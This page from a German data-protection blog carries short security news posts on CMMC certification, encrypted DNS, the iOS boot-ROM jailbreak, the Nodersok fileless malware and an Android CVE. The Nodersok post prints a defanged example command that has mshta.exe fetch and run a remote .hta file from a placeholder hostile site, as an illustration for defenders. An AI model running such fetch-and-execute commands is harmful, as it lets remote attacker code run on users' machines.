CMMC - Cybersecurity Maturity Model Certification

Erstmals wurde im Mai 2019 vom Pentagon angekündigt, dass eine Cybersecurity Qualifizierung für Dienstleister des Departments of Defense („DoD“) geschaffen werden sollte. Bestimmte Tätigkeiten werden vom DoD outgesourct und da geht es dem DoD genauso, wie jedem anderen Unternehmen, dass bestimmte Verarbeitungstätigkeiten auslagert: Die Sicherheit des Gesamtsystems ist genauso hoch, wie die Sicherheit des schwächsten Gliedes.

Insofern hilft hier natürlich die ganzheitliche Problembetrachtung. Das Programm nennt sich „CMMC“ - Cybersecurity Maturity Model Certification. Das Konzept zielt darauf ab, die Einhaltung der föderalen Cybersicherheitsvorschriften rund um kontrollierte, nicht klassifizierte Informationen (CUI) durch ein Unternehmen zu zertifizieren. Im Ziel soll eine Risikoqualifikation (und Ertüchtigung) an allen Stellen der Lieferkette angestrebt werden. Ab 2020 sollen die Lieferanten-Unternehmen durch externe Audits deren Compliance nachweisen.

Insgesamt werden fünf Reifegradstufen unterschieden:

  • CMMC Level 1 | Basic Cyber Hygiene | 17 security controls (NIST SP 800-171 rev 1)
  • CMMC Level 2 | Intermediate Cyber Hygiene | 46 security controls (NIST SP 800-171 rev 1)
  • CMMC Level 3 | Good Cyber Hygiene | 47 security controls (NIST SP 800-171 rev 1)
  • CMMC Level 4 | Proactive | 26 security controls (NIST SP 800-171B)
  • CMMC Level 5 | Advanced/Progressive | 4 security controls (NIST SP 800-171B)

Hier gibt es detailliert Infos zu dem System direkt vom DoD: https://www.acq.osd.mil/cmmc/faq.html

Datenschutz Bochum meint: Die ganzheitliche Betrachtungsweise von Cybersicherheit über die gesamte Lieferkette ist überfällig. Wir sitzen alle in einem Boot.

Google und die verschlüsselten DNS-Abfragen

Es gibt ja die These, dass die gesellschaftliche Zukunft staatenlos sein könnte. Die Begründung liegt darin, dass die uns bisher bekannten Nationalstaaten in diesen digitalen "Neuland"-Zeiten nicht mehr wie früher in der Lage sind, unsere digitalen Grenzen zu schützen. Und wenn sie das nicht können, dann wären sie überflüssig.

Insofern ist es ganz interessant zu sehen, wo der "alte Staat" mit den jungen "Herausforderern" (und diese auch untereinander) um die Pole-Position kämpft.

Ein aktuelles Schlachtfeld ist die Privatheit. Der Staat möchte die Sicherheit seiner Bürger schützen und möchte daher die Privatheit beschränken. Diese Beschränkung würde aber wiederum die Macht der jungen Herausforderer schmälern, was diese natürlich nicht wollen. Unter den jungen Herausforderern gibt es natürlich Große und Kleine, Wichtige und Unwichtige.

Da passt die Meldung, dass

Weiterlesen: Google und die verschlüsselten DNS-Abfragen

Geheimagenten aufgepasst!

Wenn James Bond nur wenige Sekunden hat, um das Smartphone eines Gegners zu kompromittieren, dann kann man das getrost als "ist ja nur ein Film" abtun. Was jetzt über eine neue IOS-Lücke bekannt wurde, wäre bestimmt auch für James Bond interessant: Von dem Twitter-Account "axi0mX" wurde ein Jailbreak veröffentlicht, der sämtliche iPhones bis einschl. iPhone X betrifft. Das sind die Prozessoren A5 bis A11. Das iPhone 11 mit dem A12 Prozessor ist davon nicht betroffen. Mit Hilfe des Jailbreaks kann dann auch von Apple nicht authorisierte Software installiert werden.

Und danach gehört das iPhone James Bond...

Die Lücke sitzt im sogenannten "Boot-ROM", also dem Code, der quasi als Erstes beim Boot-Vorgang geladen wird. Dieses Boot-Rom ist - wie der Name schon sagt "Read Only Memory", d.h. dieser Speicher kann nicht durch ein Software-Update aktualisiert werden. Daher stammt auch der Name für den Jailbreak": "Checkmate" heißt "Schachmatt".

Datenschutz Bochum meint: Es läuft zut Zeit nicht gut für Apple.

Nodersok - Living off the Land

Ich war am Wochenenende in Berlin. Es war der Berlin Marathon und im Stadtkern waren etliche Strassen gesperrt. Da wurde es auf den verbleibenden Straßen noch voller, als es dort - aus Bochumer Sicht - sonst so ist. Da kommen einem schon Idee, wie schön es sein könnte, auf dem Land zu wohnen.

Diese Idee hatten wohl auch die Schöpfer der Maleware "Nodersok" (der Name stammt vom Microsoft Defender ATP Research Team und ich konnte leider nicht herausfinden, was er bedeutet :-( ). Jedenfalls schwärmte das Nodersok-Entwicklerteam wohl auch davon sein ganzes Zeug außerhalb des Kerns zu halten.

Die Maleware nutzt Living-off-the-Land-Bibliotheken um sich an legale MIcrosoft-Tools anzuhängen und den "bösen Code" dateilos nachzuladen. Bei einer forensischen Analyse findet man kein befallenen Dateien auf dem System, wenn man keine Memory-Analyse macht. Die "legalen Tools" die Nordersok verwendet sind u.a. windivert.dll/sys (das ist Tool mit dem Netzwerk Pakete mitgelesen, gefiltert und verändert werden können. Es kann "silent" installiert werden (also ohne User-Interaktion). Außerdem wird Node.exe verwendet, das von vielen Webapplikationen gebraucht wird, die mit dem node.js-Framework arbeiten.

Nach einer Anlayse von Microsoft sind die meisten Installationen in den US und Großbritannien festgestellt  worden (60% + 21%). Auf Platz 3 ist aber schon Deutschland mit 8%.

Microsoft sagt, dass die Infektion schwer zu erkennen war, weil diese "unter dem Radar" lief. Mitte Juli 2019 fiel Nordersok dann aber doch auf und Microsoft stelte durch die Auswertungen der Microsoft Defender telemetire-Daten fest, dass "MSHTA.exe" ungewöhnliche Daten versendete. MSHTA.exe führt HTML-Applikationen aus, indem das Programm mit einer ".hta"-Datei ausgeführt wird. Die Sysntax dazu lautet wie folgt:

 mshta.exe http[:]//boese_seite.de/boeser_code.hta

Aber es nicht auf die Ausführung von .hta-Dateien begrenzt. Wen es interessiert, der kann sich hier bei McAfee eine tiefere Erklärung anschauen. Dann erkennt man, wie umfänglich die Möglichkeiten sind.

Microsoft hat ein schönes Infektions-Diagramm erstellt, dass man sich hier anschauen kann: https://www.microsoft.com/security/blog/wp-content/uploads/2019/09/Fig3c-Nodersok-attack-chain.png

Was hilft? McAfee empfiehlt die Default-Application für .hta-Dateien von MSHTA.exe auf Editor.exe umzustellen.

Datenschutz Bochum meint: Zwar ist es scheibar schön ruhig auf dem Land, aber nicht ungefährlich.

 

 

"Problematische" Lücke in allen Android-Versionen bis einschl. Version 9 ("Pie")

In allen Android-Versionen (bis einschließlich Version 9) wurde eine Lücke gefunden, die in der Komponentenbibliothek "Jobstore" enthalten ist. Der Zugriff kann nur lokal erfolgen und benötigt eine vorherige Authentifizierung. Die Lücke ist unter CVE-2019-9373 veröffentlicht. Es gibt keine Hilfe, außer dem Update auf Android 10. Das ist aber bekanntermaßen nicht für alle Android-Geräte erhältlich. Die Schwere der Lücke wird als "Problematisch" beschrieben.

  1. Der IT-Fachkräftemangel und seine realen Auswirkungen
  2. Datenschutz-Framework des US-NIST
  3. Kalifornien: Liste der Datenschutzvorfälle
  4. USA: SHIELD-Act